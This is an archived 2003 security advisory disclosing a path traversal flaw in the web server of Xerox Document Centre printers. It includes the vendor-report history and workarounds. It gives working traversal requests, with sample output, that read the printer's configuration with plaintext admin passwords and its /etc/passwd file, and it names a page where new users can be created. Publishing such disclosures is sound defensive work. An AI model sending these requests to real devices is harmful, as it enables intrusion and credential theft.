exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xerox.txt

xerox.txt
Posted Dec 23, 2003
Authored by J.A. Gutierrez

Xerox Document Centre 470, 255ST, and possibly others allow for remote unauthorized access to files, access to plaintext passwords for the HTTP administration interface, access to DES passwords for the operating system, and read-write access to HTTP users and passwords.

tags | advisory, remote, web
SHA-256 | 026b93d3219efe238d3210af33b8dafe109314334e03c1bb222b23d44131e548

xerox.txt

Change Mirror Download
CONTACT INFORMATION
===============================================================================

Name : J.A. Gutierrez
E-mail : spd@shiva.cps.unizar.es


Reported this to the vendor on Mon Dec 15 2003 using feedback form
at http://www.xerox.com, since I couldn't find a security contact.


TECHNICAL INFO
===============================================================================

Vulnerable systems
- --------------------------------------------------------------

Xerox Document Centre 470, 255ST and maybe others.
Software : Xerox_MicroServer
Version : Xerox11 0.19.5.509
OS : LynxOS:E2.1_SMP.063.1:02/13/2003


Impact
- -----------------------------------------


Remote access to files.
Access to plaintext passwords for the http administration interface.
Access to DES passwords for the operating system.
Read-write access to http users and passwords


Details
- --------------------------------------------------------------

Web server software (self-reports as "Xerox_MicroServer/Xerox11")
for Xerox hardware will return a binary dump of directories when
the requested URL ends with "/.." or "/."; so you can build easily
the directory/file tree from document root and get every file.

At first, you can't get back past document root, since httpd seems
to reject "../" if it would climb back too much:


GET /../.. -> "The request had invalid syntax."

But it does accept "../":

GET /assist/.. -> OK

So maybe it just counts "../" groups and compares the count
to the total number of "/" ? Let's try:

GET /assist/////.././../../. -> OK



Examples:

- http://xerox_dc_470.example.com/..


00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

- http://xerox_dc_470.example.com////../../data/config/microsrv.cfg

and you get full configuration, including plain text passwords.

- http://xerox_dc_470.example.com////////../../../../../../etc/passwd

and you get a passwd file to run crack on


Even without having to use ".." you can get the plain text passwords
for the HTTP interface using

http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml

From that page, you can even create new users; when you press
"Apply new settings" button prompts for admin password (the
same you just have read in that same page)


Probably you could use this to steal documents from the printer
queue, but I haven't verified this.


Note: to test this vulnerability do not use any "smart" http client
which will rewrite the URL internally to suppress '../' parts.



Workaround
- ---------------------------------------------------------------------

- Disable http interface.
- Restrict access permissions to trusted hosts

===============================================================================


--
finger spd@shiva.cps.unizar.es for PGP /
.mailcap tip of the day: / La vida es una carcel
application/ms-tnef; cat '%s' > /dev/null / con las puertas abiertas
text/x-vcard; cat '%s' > /dev/null / (A. Calamaro)
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close